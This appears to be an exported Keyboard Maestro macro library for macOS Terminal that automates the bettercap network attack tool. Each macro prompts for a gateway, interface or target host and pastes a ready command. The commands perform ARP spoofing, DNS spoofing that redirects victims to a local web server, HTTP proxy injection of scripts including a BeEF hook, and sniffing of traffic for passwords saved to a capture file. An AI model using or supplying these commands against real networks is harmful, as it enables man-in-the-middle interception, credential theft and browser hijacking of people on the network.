<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
	<dict>
		<key>Activate</key>
		<string>Normal</string>
		<key>CreationDate</key>
		<real>604439241.08792102</real>
		<key>CustomIconData</key>
		<string>KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app</string>
		<key>Macros</key>
		<array>
			<dict>
				<key>Actions</key>
				<array>
					<dict>
						<key>Buttons</key>
						<array>
							<dict>
								<key>Button</key>
								<string>OK</string>
							</dict>
							<dict>
								<key>Button</key>
								<string>Cancel</string>
								<key>Cancel</key>
								<true/>
							</dict>
						</array>
						<key>MacroActionType</key>
						<string>PromptForUserInput</string>
						<key>Prompt</key>
						<string>Please enter the information needed (domain and rhost are optional):</string>
						<key>TimeOutAbortsMacro</key>
						<true/>
						<key>Title</key>
						<string>Scan network</string>
						<key>Variables</key>
						<array>
							<dict>
								<key>Default</key>
								<string>%Variable%Gateway%</string>
								<key>Variable</key>
								<string>Gateway</string>
							</dict>
							<dict>
								<key>Default</key>
								<string>%Variable%Interface%</string>
								<key>Variable</key>
								<string>interface</string>
							</dict>
						</array>
					</dict>
					<dict>
						<key>Action</key>
						<string>ByPasting</string>
						<key>MacroActionType</key>
						<string>InsertText</string>
						<key>Text</key>
						<string>sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'net.recon on;net.probe on;clear;ticker on;'</string>
					</dict>
					<dict>
						<key>IsDisclosed</key>
						<false/>
						<key>KeyCode</key>
						<integer>36</integer>
						<key>MacroActionType</key>
						<string>SimulateKeystroke</string>
						<key>Modifiers</key>
						<integer>0</integer>
						<key>ReleaseAll</key>
						<false/>
						<key>TargetApplication</key>
						<dict/>
						<key>TargetingType</key>
						<string>Front</string>
					</dict>
				</array>
				<key>CreationDate</key>
				<real>604447378.603374</real>
				<key>CustomIconData</key>
				<string>KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app</string>
				<key>ModificationDate</key>
				<real>610919145.01962996</real>
				<key>Name</key>
				<string>Scan network (bettercap)</string>
				<key>Triggers</key>
				<array>
					<dict>
						<key>MacroTriggerType</key>
						<string>StatusMenu</string>
					</dict>
				</array>
				<key>UID</key>
				<string>C7A8BAFF-E384-45F6-AFC7-EE8E991C840F</string>
			</dict>
		</array>
		<key>Name</key>
		<string>Bettercap</string>
		<key>Targeting</key>
		<dict>
			<key>Targeting</key>
			<string>Included</string>
			<key>TargetingApps</key>
			<array>
				<dict>
					<key>BundleIdentifier</key>
					<string>com.apple.Terminal</string>
					<key>Name</key>
					<string>Terminal</string>
					<key>NewFile</key>
					<string>/System/Applications/Utilities/Terminal.app</string>
				</dict>
				<dict>
					<key>BundleIdentifier</key>
					<string>com.googlecode.iterm2</string>
					<key>Name</key>
					<string>iTerm</string>
					<key>NewFile</key>
					<string>/Applications/iTerm.app</string>
				</dict>
			</array>
		</dict>
		<key>ToggleMacroUID</key>
		<string>0E4EEE6F-037D-40A3-98D0-6FCF76CA6505</string>
		<key>UID</key>
		<string>8849B08E-11E5-4AF9-BBF0-327D0490E714</string>
	</dict>
	<dict>
		<key>Activate</key>
		<string>Normal</string>
		<key>CreationDate</key>
		<real>604439241.08792102</real>
		<key>CustomIconData</key>
		<string>KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app</string>
		<key>Macros</key>
		<array>
			<dict>
				<key>Actions</key>
				<array>
					<dict>
						<key>Buttons</key>
						<array>
							<dict>
								<key>Button</key>
								<string>OK</string>
							</dict>
							<dict>
								<key>Button</key>
								<string>Cancel</string>
								<key>Cancel</key>
								<true/>
							</dict>
						</array>
						<key>MacroActionType</key>
						<string>PromptForUserInput</string>
						<key>Prompt</key>
						<string>Please enter the local gateway and interface:</string>
						<key>TimeOutAbortsMacro</key>
						<true/>
						<key>Title</key>
						<string>Open bettercap</string>
						<key>Variables</key>
						<array>
							<dict>
								<key>Default</key>
								<string>%Variable%Gateway%</string>
								<key>Variable</key>
								<string>Gateway</string>
							</dict>
							<dict>
								<key>Default</key>
								<string>%Variable%Interface%</string>
								<key>Variable</key>
								<string>Interface</string>
							</dict>
						</array>
					</dict>
					<dict>
						<key>Action</key>
						<string>ByPasting</string>
						<key>MacroActionType</key>
						<string>InsertText</string>
						<key>Text</key>
						<string>sudo bettercap -caplet http-ui -gateway-override %Variable%Gateway% -iface %Variable%Interface%</string>
					</dict>
					<dict>
						<key>IsDisclosed</key>
						<false/>
						<key>KeyCode</key>
						<integer>36</integer>
						<key>MacroActionType</key>
						<string>SimulateKeystroke</string>
						<key>Modifiers</key>
						<integer>0</integer>
						<key>ReleaseAll</key>
						<false/>
						<key>TargetApplication</key>
						<dict/>
						<key>TargetingType</key>
						<string>Front</string>
					</dict>
				</array>
				<key>CreationDate</key>
				<real>603158737.91990697</real>
				<key>CustomIconData</key>
				<string>KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app</string>
				<key>ModificationDate</key>
				<real>604465850.83681703</real>
				<key>Name</key>
				<string>Open bettercap (web view)</string>
				<key>Triggers</key>
				<array>
					<dict>
						<key>MacroTriggerType</key>
						<string>StatusMenu</string>
					</dict>
				</array>
				<key>UID</key>
				<string>B466BFAC-2F85-4ED7-BB1E-C14C1D73D1A4</string>
			</dict>
		</array>
		<key>Name</key>
		<string>Bettercap</string>
		<key>Targeting</key>
		<dict>
			<key>Targeting</key>
			<string>Included</string>
			<key>TargetingApps</key>
			<array>
				<dict>
					<key>BundleIdentifier</key>
					<string>com.apple.Terminal</string>
					<key>Name</key>
					<string>Terminal</string>
					<key>NewFile</key>
					<string>/System/Applications/Utilities/Terminal.app</string>
				</dict>
				<dict>
					<key>BundleIdentifier</key>
					<string>com.googlecode.iterm2</string>
					<key>Name</key>
					<string>iTerm</string>
					<key>NewFile</key>
					<string>/Applications/iTerm.app</string>
				</dict>
			</array>
		</dict>
		<key>ToggleMacroUID</key>
		<string>0E4EEE6F-037D-40A3-98D0-6FCF76CA6505</string>
		<key>UID</key>
		<string>8849B08E-11E5-4AF9-BBF0-327D0490E714</string>
	</dict>
	<dict>
		<key>Activate</key>
		<string>Normal</string>
		<key>CreationDate</key>
		<real>604439241.08792102</real>
		<key>CustomIconData</key>
		<string>KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app</string>
		<key>Macros</key>
		<array>
			<dict>
				<key>Actions</key>
				<array>
					<dict>
						<key>Buttons</key>
						<array>
							<dict>
								<key>Button</key>
								<string>OK</string>
							</dict>
							<dict>
								<key>Button</key>
								<string>Cancel</string>
								<key>Cancel</key>
								<true/>
							</dict>
						</array>
						<key>MacroActionType</key>
						<string>PromptForUserInput</string>
						<key>Prompt</key>
						<string>Please enter the local gateway and interface:</string>
						<key>TimeOutAbortsMacro</key>
						<true/>
						<key>Title</key>
						<string>Open bettercap</string>
						<key>Variables</key>
						<array>
							<dict>
								<key>Default</key>
								<string>%Variable%Gateway%</string>
								<key>Variable</key>
								<string>Gateway</string>
							</dict>
							<dict>
								<key>Default</key>
								<string>%Variable%Interface%</string>
								<key>Variable</key>
								<string>Interface</string>
							</dict>
						</array>
					</dict>
					<dict>
						<key>Action</key>
						<string>ByPasting</string>
						<key>MacroActionType</key>
						<string>InsertText</string>
						<key>Text</key>
						<string>sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface%</string>
					</dict>
					<dict>
						<key>IsDisclosed</key>
						<false/>
						<key>KeyCode</key>
						<integer>36</integer>
						<key>MacroActionType</key>
						<string>SimulateKeystroke</string>
						<key>Modifiers</key>
						<integer>0</integer>
						<key>ReleaseAll</key>
						<false/>
						<key>TargetApplication</key>
						<dict/>
						<key>TargetingType</key>
						<string>Front</string>
					</dict>
				</array>
				<key>CreationDate</key>
				<real>603158737.91990697</real>
				<key>CustomIconData</key>
				<string>KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app</string>
				<key>ModificationDate</key>
				<real>604460217.17678595</real>
				<key>Name</key>
				<string>Open bettercap</string>
				<key>Triggers</key>
				<array>
					<dict>
						<key>MacroTriggerType</key>
						<string>StatusMenu</string>
					</dict>
				</array>
				<key>UID</key>
				<string>0A677BCF-70A5-45EF-A5E9-FF26D38E3E22</string>
			</dict>
		</array>
		<key>Name</key>
		<string>Bettercap</string>
		<key>Targeting</key>
		<dict>
			<key>Targeting</key>
			<string>Included</string>
			<key>TargetingApps</key>
			<array>
				<dict>
					<key>BundleIdentifier</key>
					<string>com.apple.Terminal</string>
					<key>Name</key>
					<string>Terminal</string>
					<key>NewFile</key>
					<string>/System/Applications/Utilities/Terminal.app</string>
				</dict>
				<dict>
					<key>BundleIdentifier</key>
					<string>com.googlecode.iterm2</string>
					<key>Name</key>
					<string>iTerm</string>
					<key>NewFile</key>
					<string>/Applications/iTerm.app</string>
				</dict>
			</array>
		</dict>
		<key>ToggleMacroUID</key>
		<string>0E4EEE6F-037D-40A3-98D0-6FCF76CA6505</string>
		<key>UID</key>
		<string>8849B08E-11E5-4AF9-BBF0-327D0490E714</string>
	</dict>
	<dict>
		<key>Activate</key>
		<string>Normal</string>
		<key>CreationDate</key>
		<real>604439241.08792102</real>
		<key>CustomIconData</key>
		<string>KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app</string>
		<key>Macros</key>
		<array>
			<dict>
				<key>Actions</key>
				<array>
					<dict>
						<key>Buttons</key>
						<array>
							<dict>
								<key>Button</key>
								<string>OK</string>
							</dict>
							<dict>
								<key>Button</key>
								<string>Cancel</string>
								<key>Cancel</key>
								<true/>
							</dict>
						</array>
						<key>MacroActionType</key>
						<string>PromptForUserInput</string>
						<key>Prompt</key>
						<string>Please enter the information needed (domain and rhost are optional):</string>
						<key>TimeOutAbortsMacro</key>
						<true/>
						<key>Title</key>
						<string>HTTP Script injection</string>
						<key>Variables</key>
						<array>
							<dict>
								<key>Default</key>
								<string>%Variable%Gateway%</string>
								<key>Variable</key>
								<string>Gateway</string>
							</dict>
							<dict>
								<key>Default</key>
								<string>%Variable%RHOST%</string>
								<key>Variable</key>
								<string>RHOST</string>
							</dict>
							<dict>
								<key>Default</key>
								<string>%Variable%Domain%</string>
								<key>Variable</key>
								<string>Domain</string>
							</dict>
							<dict>
								<key>Default</key>
								<string>beef.js|invert.js|redirect.js|replace.js|web-override.js</string>
								<key>Variable</key>
								<string>Script</string>
							</dict>
							<dict>
								<key>Default</key>
								<string>%Variable%Interface%</string>
								<key>Variable</key>
								<string>interface</string>
							</dict>
						</array>
					</dict>
					<dict>
						<key>Conditions</key>
						<dict>
							<key>ConditionList</key>
							<array>
								<dict>
									<key>ConditionType</key>
									<string>Variable</string>
									<key>Variable</key>
									<string>RHOST</string>
									<key>VariableConditionType</key>
									<string>IsEmpty</string>
									<key>VariableValue</key>
									<string>value</string>
								</dict>
							</array>
							<key>ConditionListMatch</key>
							<string>All</string>
						</dict>
						<key>ElseActions</key>
						<array>
							<dict>
								<key>Conditions</key>
								<dict>
									<key>ConditionList</key>
									<array>
										<dict>
											<key>ConditionType</key>
											<string>Variable</string>
											<key>Variable</key>
											<string>Domain</string>
											<key>VariableConditionType</key>
											<string>IsEmpty</string>
											<key>VariableValue</key>
											<string>value</string>
										</dict>
									</array>
									<key>ConditionListMatch</key>
									<string>All</string>
								</dict>
								<key>ElseActions</key>
								<array>
									<dict>
										<key>Action</key>
										<string>ByPasting</string>
										<key>MacroActionType</key>
										<string>InsertText</string>
										<key>Text</key>
										<string>sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'set arp.spoof.fullduplex true;set arp.spoof.targets %Variable%RHOST%;arp.spoof on;set http.proxy.script /Library/WebServer/Documents/bettercap/%Variable%Script%;set http.proxy.blacklist *;set http.proxy.whitelist %Variable%Domain%;http.proxy on'</string>
									</dict>
								</array>
								<key>MacroActionType</key>
								<string>IfThenElse</string>
								<key>ThenActions</key>
								<array>
									<dict>
										<key>Action</key>
										<string>ByPasting</string>
										<key>MacroActionType</key>
										<string>InsertText</string>
										<key>Text</key>
										<string>sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'set arp.spoof.fullduplex true;set arp.spoof.targets %Variable%RHOST%;arp.spoof on;set http.proxy.script /Library/WebServer/Documents/bettercap/%Variable%Script%;http.proxy on'</string>
									</dict>
								</array>
								<key>TimeOutAbortsMacro</key>
								<true/>
							</dict>
						</array>
						<key>MacroActionType</key>
						<string>IfThenElse</string>
						<key>ThenActions</key>
						<array>
							<dict>
								<key>Conditions</key>
								<dict>
									<key>ConditionList</key>
									<array>
										<dict>
											<key>ConditionType</key>
											<string>Variable</string>
											<key>Variable</key>
											<string>Domain</string>
											<key>VariableConditionType</key>
											<string>IsEmpty</string>
											<key>VariableValue</key>
											<string>value</string>
										</dict>
									</array>
									<key>ConditionListMatch</key>
									<string>All</string>
								</dict>
								<key>ElseActions</key>
								<array>
									<dict>
										<key>Action</key>
										<string>ByPasting</string>
										<key>MacroActionType</key>
										<string>InsertText</string>
										<key>Text</key>
										<string>sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'set arp.spoof.fullduplex true;arp.spoof on;set http.proxy.script /Library/WebServer/Documents/bettercap/%Variable%Script%;set http.proxy.blacklist *;set http.proxy.whitelist %Variable%Domain%;http.proxy on'</string>
									</dict>
								</array>
								<key>MacroActionType</key>
								<string>IfThenElse</string>
								<key>ThenActions</key>
								<array>
									<dict>
										<key>Action</key>
										<string>ByPasting</string>
										<key>MacroActionType</key>
										<string>InsertText</string>
										<key>Text</key>
										<string>sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'set arp.spoof.fullduplex true;arp.spoof on;set http.proxy.script /Library/WebServer/Documents/bettercap/%Variable%Script%;http.proxy on'</string>
									</dict>
								</array>
								<key>TimeOutAbortsMacro</key>
								<true/>
							</dict>
						</array>
						<key>TimeOutAbortsMacro</key>
						<true/>
					</dict>
					<dict>
						<key>IsDisclosed</key>
						<false/>
						<key>KeyCode</key>
						<integer>36</integer>
						<key>MacroActionType</key>
						<string>SimulateKeystroke</string>
						<key>Modifiers</key>
						<integer>0</integer>
						<key>ReleaseAll</key>
						<false/>
						<key>TargetApplication</key>
						<dict/>
						<key>TargetingType</key>
						<string>Front</string>
					</dict>
				</array>
				<key>CreationDate</key>
				<real>604447378.603374</real>
				<key>CustomIconData</key>
				<string>KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app</string>
				<key>ModificationDate</key>
				<real>604477603.24702001</real>
				<key>Name</key>
				<string>HTTP Script injection (bettercap)</string>
				<key>Triggers</key>
				<array>
					<dict>
						<key>MacroTriggerType</key>
						<string>StatusMenu</string>
					</dict>
				</array>
				<key>UID</key>
				<string>4ECBA013-A056-4A24-9FA6-7AA3F8075DDD</string>
			</dict>
		</array>
		<key>Name</key>
		<string>Bettercap</string>
		<key>Targeting</key>
		<dict>
			<key>Targeting</key>
			<string>Included</string>
			<key>TargetingApps</key>
			<array>
				<dict>
					<key>BundleIdentifier</key>
					<string>com.apple.Terminal</string>
					<key>Name</key>
					<string>Terminal</string>
					<key>NewFile</key>
					<string>/System/Applications/Utilities/Terminal.app</string>
				</dict>
				<dict>
					<key>BundleIdentifier</key>
					<string>com.googlecode.iterm2</string>
					<key>Name</key>
					<string>iTerm</string>
					<key>NewFile</key>
					<string>/Applications/iTerm.app</string>
				</dict>
			</array>
		</dict>
		<key>ToggleMacroUID</key>
		<string>0E4EEE6F-037D-40A3-98D0-6FCF76CA6505</string>
		<key>UID</key>
		<string>8849B08E-11E5-4AF9-BBF0-327D0490E714</string>
	</dict>
	<dict>
		<key>Activate</key>
		<string>Normal</string>
		<key>CreationDate</key>
		<real>604439241.08792102</real>
		<key>CustomIconData</key>
		<string>KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app</string>
		<key>Macros</key>
		<array>
			<dict>
				<key>Actions</key>
				<array>
					<dict>
						<key>Buttons</key>
						<array>
							<dict>
								<key>Button</key>
								<string>OK</string>
							</dict>
							<dict>
								<key>Button</key>
								<string>Cancel</string>
								<key>Cancel</key>
								<true/>
							</dict>
						</array>
						<key>MacroActionType</key>
						<string>PromptForUserInput</string>
						<key>Prompt</key>
						<string>Please enter the information needed (rhost is optional):</string>
						<key>TimeOutAbortsMacro</key>
						<true/>
						<key>Title</key>
						<string>DNS spoofing</string>
						<key>Variables</key>
						<array>
							<dict>
								<key>Default</key>
								<string>%Variable%Gateway%</string>
								<key>Variable</key>
								<string>Gateway</string>
							</dict>
							<dict>
								<key>Default</key>
								<string>%Variable%RHOST%</string>
								<key>Variable</key>
								<string>RHOST</string>
							</dict>
							<dict>
								<key>Default</key>
								<string>%Variable%LHOST%</string>
								<key>Variable</key>
								<string>LHOST</string>
							</dict>
							<dict>
								<key>Default</key>
								<string>%Variable%Interface%</string>
								<key>Variable</key>
								<string>interface</string>
							</dict>
							<dict>
								<key>Default</key>
								<string>%Variable%Domain%</string>
								<key>Variable</key>
								<string>Domain</string>
							</dict>
						</array>
					</dict>
					<dict>
						<key>Conditions</key>
						<dict>
							<key>ConditionList</key>
							<array>
								<dict>
									<key>ConditionType</key>
									<string>Variable</string>
									<key>Variable</key>
									<string>RHOST</string>
									<key>VariableConditionType</key>
									<string>IsEmpty</string>
									<key>VariableValue</key>
									<string>value</string>
								</dict>
							</array>
							<key>ConditionListMatch</key>
							<string>All</string>
						</dict>
						<key>ElseActions</key>
						<array>
							<dict>
								<key>Action</key>
								<string>ByPasting</string>
								<key>MacroActionType</key>
								<string>InsertText</string>
								<key>Text</key>
								<string>sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'set arp.spoof.fullduplex true;set arp.spoof.targets %Variable%RHOST%;arp.spoof on;set dns.spoof.domains %Variable%Domain%;set dns.spoof.address %Variable%LHOST%;dns.spoof on;set http.server.path /Library/WebServer/Documents;http.server on'</string>
							</dict>
						</array>
						<key>MacroActionType</key>
						<string>IfThenElse</string>
						<key>ThenActions</key>
						<array>
							<dict>
								<key>Action</key>
								<string>ByPasting</string>
								<key>MacroActionType</key>
								<string>InsertText</string>
								<key>Text</key>
								<string>sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'set arp.spoof.fullduplex true;arp.spoof on;set dns.spoof.domains %Variable%Domain%;set dns.spoof.all true;dns.spoof on;set http.server.path /Library/WebServer/Documents;http.server on'</string>
							</dict>
						</array>
						<key>TimeOutAbortsMacro</key>
						<true/>
					</dict>
					<dict>
						<key>IsDisclosed</key>
						<false/>
						<key>KeyCode</key>
						<integer>36</integer>
						<key>MacroActionType</key>
						<string>SimulateKeystroke</string>
						<key>Modifiers</key>
						<integer>0</integer>
						<key>ReleaseAll</key>
						<false/>
						<key>TargetApplication</key>
						<dict/>
						<key>TargetingType</key>
						<string>Front</string>
					</dict>
				</array>
				<key>CreationDate</key>
				<real>604447378.603374</real>
				<key>CustomIconData</key>
				<string>KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app</string>
				<key>ModificationDate</key>
				<real>604471840.16793704</real>
				<key>Name</key>
				<string>DNS spoofing (bettercap)</string>
				<key>Triggers</key>
				<array>
					<dict>
						<key>MacroTriggerType</key>
						<string>StatusMenu</string>
					</dict>
				</array>
				<key>UID</key>
				<string>201B3F76-A89D-44E9-B003-47798139B4F8</string>
			</dict>
		</array>
		<key>Name</key>
		<string>Bettercap</string>
		<key>Targeting</key>
		<dict>
			<key>Targeting</key>
			<string>Included</string>
			<key>TargetingApps</key>
			<array>
				<dict>
					<key>BundleIdentifier</key>
					<string>com.apple.Terminal</string>
					<key>Name</key>
					<string>Terminal</string>
					<key>NewFile</key>
					<string>/System/Applications/Utilities/Terminal.app</string>
				</dict>
				<dict>
					<key>BundleIdentifier</key>
					<string>com.googlecode.iterm2</string>
					<key>Name</key>
					<string>iTerm</string>
					<key>NewFile</key>
					<string>/Applications/iTerm.app</string>
				</dict>
			</array>
		</dict>
		<key>ToggleMacroUID</key>
		<string>0E4EEE6F-037D-40A3-98D0-6FCF76CA6505</string>
		<key>UID</key>
		<string>8849B08E-11E5-4AF9-BBF0-327D0490E714</string>
	</dict>
	<dict>
		<key>Activate</key>
		<string>Normal</string>
		<key>CreationDate</key>
		<real>604439241.08792102</real>
		<key>CustomIconData</key>
		<string>KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app</string>
		<key>Macros</key>
		<array>
			<dict>
				<key>Actions</key>
				<array>
					<dict>
						<key>Buttons</key>
						<array>
							<dict>
								<key>Button</key>
								<string>OK</string>
							</dict>
							<dict>
								<key>Button</key>
								<string>Cancel</string>
								<key>Cancel</key>
								<true/>
							</dict>
						</array>
						<key>MacroActionType</key>
						<string>PromptForUserInput</string>
						<key>Prompt</key>
						<string>Please enter the information needed (domain and rhost are optional):</string>
						<key>TimeOutAbortsMacro</key>
						<true/>
						<key>Title</key>
						<string>Script injection</string>
						<key>Variables</key>
						<array>
							<dict>
								<key>Default</key>
								<string>%Variable%Gateway%</string>
								<key>Variable</key>
								<string>Gateway</string>
							</dict>
							<dict>
								<key>Default</key>
								<string>%Variable%RHOST%</string>
								<key>Variable</key>
								<string>RHOST</string>
							</dict>
							<dict>
								<key>Default</key>
								<string>%Variable%Interface%</string>
								<key>Variable</key>
								<string>interface</string>
							</dict>
						</array>
					</dict>
					<dict>
						<key>Conditions</key>
						<dict>
							<key>ConditionList</key>
							<array>
								<dict>
									<key>ConditionType</key>
									<string>Variable</string>
									<key>Variable</key>
									<string>RHOST</string>
									<key>VariableConditionType</key>
									<string>IsEmpty</string>
									<key>VariableValue</key>
									<string>value</string>
								</dict>
							</array>
							<key>ConditionListMatch</key>
							<string>All</string>
						</dict>
						<key>ElseActions</key>
						<array>
							<dict>
								<key>Action</key>
								<string>ByPasting</string>
								<key>MacroActionType</key>
								<string>InsertText</string>
								<key>Text</key>
								<string>sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'set arp.spoof.fullduplex true;set arp.spoof.targets %Variable%RHOST%;arp.spoof on;'</string>
							</dict>
						</array>
						<key>MacroActionType</key>
						<string>IfThenElse</string>
						<key>ThenActions</key>
						<array>
							<dict>
								<key>Action</key>
								<string>ByPasting</string>
								<key>MacroActionType</key>
								<string>InsertText</string>
								<key>Text</key>
								<string>sudo bettercap -gateway-override %Variable%Gateway% -iface %Variable%Interface% -eval 'set arp.spoof.fullduplex true;arp.spoof on;'</string>
							</dict>
						</array>
						<key>TimeOutAbortsMacro</key>
						<true/>
					</dict>
					<dict>
						<key>IsDisclosed</key>
						<false/>
						<key>KeyCode</key>
						<integer>36</integer>
						<key>MacroActionType</key>
						<string>SimulateKeystroke</string>
						<key>Modifiers</key>
						<integer>0</integer>
						<key>ReleaseAll</key>
						<false/>
						<key>TargetApplication</key>
						<dict/>
						<key>TargetingType</key>
						<string>Front</string>
					</dict>
				</array>
				<key>CreationDate</key>
				<real>604447378.603374</real>
				<key>CustomIconData</key>
				<string>KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app</string>
				<key>ModificationDate</key>
				<real>604463902.08318996</real>
				<key>Name</key>
				<string>ARP spoofing (bettercap)</string>
				<key>Triggers</key>
				<array>
					<dict>
						<key>MacroTriggerType</key>
						<string>StatusMenu</string>
					</dict>
				</array>
				<key>UID</key>
				<string>A3CB8955-8A79-4019-8F21-1CBCE987FD29</string>
			</dict>
		</array>
		<key>Name</key>
		<string>Bettercap</string>
		<key>Targeting</key>
		<dict>
			<key>Targeting</key>
			<string>Included</string>
			<key>TargetingApps</key>
			<array>
				<dict>
					<key>BundleIdentifier</key>
					<string>com.apple.Terminal</string>
					<key>Name</key>
					<string>Terminal</string>
					<key>NewFile</key>
					<string>/System/Applications/Utilities/Terminal.app</string>
				</dict>
				<dict>
					<key>BundleIdentifier</key>
					<string>com.googlecode.iterm2</string>
					<key>Name</key>
					<string>iTerm</string>
					<key>NewFile</key>
					<string>/Applications/iTerm.app</string>
				</dict>
			</array>
		</dict>
		<key>ToggleMacroUID</key>
		<string>0E4EEE6F-037D-40A3-98D0-6FCF76CA6505</string>
		<key>UID</key>
		<string>8849B08E-11E5-4AF9-BBF0-327D0490E714</string>
	</dict>
	<dict>
		<key>Activate</key>
		<string>Normal</string>
		<key>CreationDate</key>
		<real>604439241.08792102</real>
		<key>CustomIconData</key>
		<string>KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app</string>
		<key>Macros</key>
		<array>
			<dict>
				<key>Actions</key>
				<array>
					<dict>
						<key>Buttons</key>
						<array>
							<dict>
								<key>Button</key>
								<string>OK</string>
							</dict>
							<dict>
								<key>Button</key>
								<string>Cancel</string>
								<key>Cancel</key>
								<true/>
							</dict>
						</array>
						<key>MacroActionType</key>
						<string>PromptForUserInput</string>
						<key>Prompt</key>
						<string>Please enter a regular expression:</string>
						<key>TimeOutAbortsMacro</key>
						<true/>
						<key>Title</key>
						<string>Active sniffing</string>
						<key>Variables</key>
						<array>
							<dict>
								<key>Default</key>
								<string>.*password=.+</string>
								<key>Variable</key>
								<string>RegEx</string>
							</dict>
						</array>
					</dict>
					<dict>
						<key>Action</key>
						<string>ByPasting</string>
						<key>MacroActionType</key>
						<string>InsertText</string>
						<key>Text</key>
						<string>set net.sniff.regexp %Variable%RegEx%;
set net.sniff.output passwords.pcap;
net.sniff on;</string>
					</dict>
					<dict>
						<key>IsDisclosed</key>
						<false/>
						<key>KeyCode</key>
						<integer>36</integer>
						<key>MacroActionType</key>
						<string>SimulateKeystroke</string>
						<key>Modifiers</key>
						<integer>0</integer>
						<key>ReleaseAll</key>
						<false/>
						<key>TargetApplication</key>
						<dict/>
						<key>TargetingType</key>
						<string>Front</string>
					</dict>
				</array>
				<key>CreationDate</key>
				<real>603158737.91990697</real>
				<key>CustomIconData</key>
				<string>KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app</string>
				<key>ModificationDate</key>
				<real>604515003.09291196</real>
				<key>Name</key>
				<string>Active sniffing (bettercap interactive)</string>
				<key>Triggers</key>
				<array>
					<dict>
						<key>MacroTriggerType</key>
						<string>StatusMenu</string>
					</dict>
				</array>
				<key>UID</key>
				<string>92C0BD54-A52C-4951-AD34-0D2921D30CDA</string>
			</dict>
		</array>
		<key>Name</key>
		<string>Bettercap</string>
		<key>Targeting</key>
		<dict>
			<key>Targeting</key>
			<string>Included</string>
			<key>TargetingApps</key>
			<array>
				<dict>
					<key>BundleIdentifier</key>
					<string>com.apple.Terminal</string>
					<key>Name</key>
					<string>Terminal</string>
					<key>NewFile</key>
					<string>/System/Applications/Utilities/Terminal.app</string>
				</dict>
				<dict>
					<key>BundleIdentifier</key>
					<string>com.googlecode.iterm2</string>
					<key>Name</key>
					<string>iTerm</string>
					<key>NewFile</key>
					<string>/Applications/iTerm.app</string>
				</dict>
			</array>
		</dict>
		<key>ToggleMacroUID</key>
		<string>0E4EEE6F-037D-40A3-98D0-6FCF76CA6505</string>
		<key>UID</key>
		<string>8849B08E-11E5-4AF9-BBF0-327D0490E714</string>
	</dict>
</array>
</plist>
